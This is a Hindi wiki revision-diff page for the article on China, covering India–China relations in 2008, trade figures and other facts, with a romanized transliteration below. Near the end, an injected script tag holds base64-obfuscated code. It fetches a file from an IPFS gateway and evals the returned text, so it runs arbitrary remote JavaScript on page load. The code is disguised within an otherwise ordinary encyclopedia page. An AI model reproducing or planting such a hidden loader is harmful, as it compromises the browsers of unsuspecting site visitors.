Difference between revisions of "चीन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:देश (को हटा दिया गया हैं।))
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
चीन विश्व की प्राचीन सभ्यताओं में से एक है जो [[एशिया महाद्वीप|एशियाई महाद्वीप]] के पू‍र्व में स्थित है। चीन की सभ्यता एवं संस्कृति छठी शताब्दी से भी पुरानी है। चीन, दुनिया का सर्वाधिक जनसंख्या वाला देश है।
+
'''चीन''' विश्व की प्राचीन सभ्यताओं में से एक है जो [[एशिया महाद्वीप|एशियाई महाद्वीप]] के पू‍र्व में स्थित है। चीन की सभ्यता एवं संस्कृति छठी शताब्दी से भी पुरानी है। चीन, दुनिया का सर्वाधिक जनसंख्या वाला देश है।
 
*वर्ष 2008 [[भारत]]-चीन संबधों की दृष्टि से महत्त्वपूर्ण वर्ष रहा है। प्रधानमंत्री [[डा. मनमोहन सिंह]] ने 13-15 जनवरी, 2008 के दौरान पीपल्स रिपब्लिक आफ चीन की सरकारी यात्रा की। [[भारत]] और चीन के नेताओं ने दोनों देशों के बीच शांति और खुशहाली के लिए सामरिक एवं सहयोगात्मक संबंध विकसित करने का संकल्प व्यक्त किया। उन्होंने सभी बकाया मतभेदों को शांतिपूर्ण बातचीत के जरिए दूर करने का दृढ़ संकल्प दोहराया और यह सुनिश्चित करने का भी संकल्प व्यक्त किया कि ऎसे मतभेदों का आपसी संबधों के रचनात्मक विकास पर कोई असर नहीं पड़ेगा। दोनों प्रधानमंत्रियों ने "21 वीं [[सदी]] के लिए साझा लक्ष्य" तय करने संबंधी दस्तावेज पर हस्ताक्षर किए, जिसमें दोनों देशों की यह अकांक्षा झलकती है कि वे क्षेत्रीय और बहुराष्ट्रीय मामलों में आपसी हित के क्षेत्रों में एक-दूसरे के साथ सहयोग करेंगे।  
 
*वर्ष 2008 [[भारत]]-चीन संबधों की दृष्टि से महत्त्वपूर्ण वर्ष रहा है। प्रधानमंत्री [[डा. मनमोहन सिंह]] ने 13-15 जनवरी, 2008 के दौरान पीपल्स रिपब्लिक आफ चीन की सरकारी यात्रा की। [[भारत]] और चीन के नेताओं ने दोनों देशों के बीच शांति और खुशहाली के लिए सामरिक एवं सहयोगात्मक संबंध विकसित करने का संकल्प व्यक्त किया। उन्होंने सभी बकाया मतभेदों को शांतिपूर्ण बातचीत के जरिए दूर करने का दृढ़ संकल्प दोहराया और यह सुनिश्चित करने का भी संकल्प व्यक्त किया कि ऎसे मतभेदों का आपसी संबधों के रचनात्मक विकास पर कोई असर नहीं पड़ेगा। दोनों प्रधानमंत्रियों ने "21 वीं [[सदी]] के लिए साझा लक्ष्य" तय करने संबंधी दस्तावेज पर हस्ताक्षर किए, जिसमें दोनों देशों की यह अकांक्षा झलकती है कि वे क्षेत्रीय और बहुराष्ट्रीय मामलों में आपसी हित के क्षेत्रों में एक-दूसरे के साथ सहयोग करेंगे।  
 
*भारत और चीन के विदेशमंत्रियों ने भी क्रमशः जून, [[2008]] और सितंबर, 2008 में एक-दूसरे देश की यात्रा की। इन यात्राओं के दौरान गुवान्झू और [[कोलकाता]] में नए, महावाणिज्य दूतावासों का औपचारिक रूप से विमोचन किया गया।  
 
*भारत और चीन के विदेशमंत्रियों ने भी क्रमशः जून, [[2008]] और सितंबर, 2008 में एक-दूसरे देश की यात्रा की। इन यात्राओं के दौरान गुवान्झू और [[कोलकाता]] में नए, महावाणिज्य दूतावासों का औपचारिक रूप से विमोचन किया गया।  
Line 9: Line 9:
 
*चीन ही एक ऐसा देश है जिसने सबसे पहले [[काग़ज़]] बनाने का काम शुरु किया था।
 
*चीन ही एक ऐसा देश है जिसने सबसे पहले [[काग़ज़]] बनाने का काम शुरु किया था।
 
*दोनों देशों ने अंतर्राष्ट्रीय वित्तीय संकट और जलवायु परिवर्तन सहित महत्त्वपूर्ण अंतर्राष्ट्री मुद्दों पर एक-दूसरे के साथ विचार-विमर्श भी किया।
 
*दोनों देशों ने अंतर्राष्ट्रीय वित्तीय संकट और जलवायु परिवर्तन सहित महत्त्वपूर्ण अंतर्राष्ट्री मुद्दों पर एक-दूसरे के साथ विचार-विमर्श भी किया।
{{प्रचार}}
+
 
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=
 
|आधार=
Line 19: Line 19:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{पड़ोसी देश}}
 
{{पड़ोसी देश}}
{{विदेशी स्थान}}
+
{{देश}}
 
[[Category:विदेशी स्थान]]
 
[[Category:विदेशी स्थान]]
 
[[Category:पड़ोसी देश]]
 
[[Category:पड़ोसी देश]]

Revision as of 12:33, 18 February 2012

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

chin vishv ki prachin sabhyataoan mean se ek hai jo eshiyaee mahadvip ke poo‍rv mean sthit hai. chin ki sabhyata evan sanskriti chhathi shatabdi se bhi purani hai. chin, duniya ka sarvadhik janasankhya vala desh hai.

  • varsh 2008 bharat-chin sanbadhoan ki drishti se mahattvapoorn varsh raha hai. pradhanamantri da. manamohan sianh ne 13-15 janavari, 2008 ke dauran pipals ripablik aph chin ki sarakari yatra ki. bharat aur chin ke netaoan ne donoan deshoan ke bich shaanti aur khushahali ke lie samarik evan sahayogatmak sanbandh vikasit karane ka sankalp vyakt kiya. unhoanne sabhi bakaya matabhedoan ko shaantipoorn batachit ke jarie door karane ka dridh sankalp doharaya aur yah sunishchit karane ka bhi sankalp vyakt kiya ki ऎse matabhedoan ka apasi sanbadhoan ke rachanatmak vikas par koee asar nahian p dega. donoan pradhanamantriyoan ne "21 vian sadi ke lie sajha lakshy" tay karane sanbandhi dastavej par hastakshar kie, jisamean donoan deshoan ki yah akaanksha jhalakati hai ki ve kshetriy aur bahurashtriy mamaloan mean apasi hit ke kshetroan mean ek-doosare ke sath sahayog kareange.
  • bharat aur chin ke videshamantriyoan ne bhi kramashah joon, 2008 aur sitanbar, 2008 mean ek-doosare desh ki yatra ki. in yatraoan ke dauran guvanjhoo aur kolakata mean ne, mahavanijy dootavasoan ka aupacharik roop se vimochan kiya gaya.
  • apasi vyapar 2008 mean 51.8 arab amariki d aaular par pahuanch gaya jo donoan pradhanamantriyoan dvara 2010 ke lie tay kie ge 60 arab amariki d aaular mooly ke lakshy ke qrarib hai.
  • raksha sanbandhoan ke kshetr mean sahayog aur adan-pradan bhi jari raha. isake aantargat disanbar, 2008 mean bharat mean doosara sayukt sainy abhyas aur doosari varshik raksha varta ayojit ki gee.
  • bharat-chin sima vivad ke bare mean 12 vean daur ke vichar-vimarsh ke lie donoan deshoan ke vishesh pratinidhiyoan ki baithak sitabanr, 2008 mean huee.
  • mee, 2008 mean chin ke sichuvan praant mean ae vinashakari bhookanp ke bad bharat ne manaviy sahayata ke roop mean chin ko 50 lakh amariki d aaular ki madad pahuanchayi.
  • chin hi ek aisa desh hai jisane sabase pahale kagaz banane ka kam shuru kiya tha.
  • donoan deshoan ne aantarrashtriy vittiy sankat aur jalavayu parivartan sahit mahattvapoorn aantarrashtri muddoan par ek-doosare ke sath vichar-vimarsh bhi kiya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh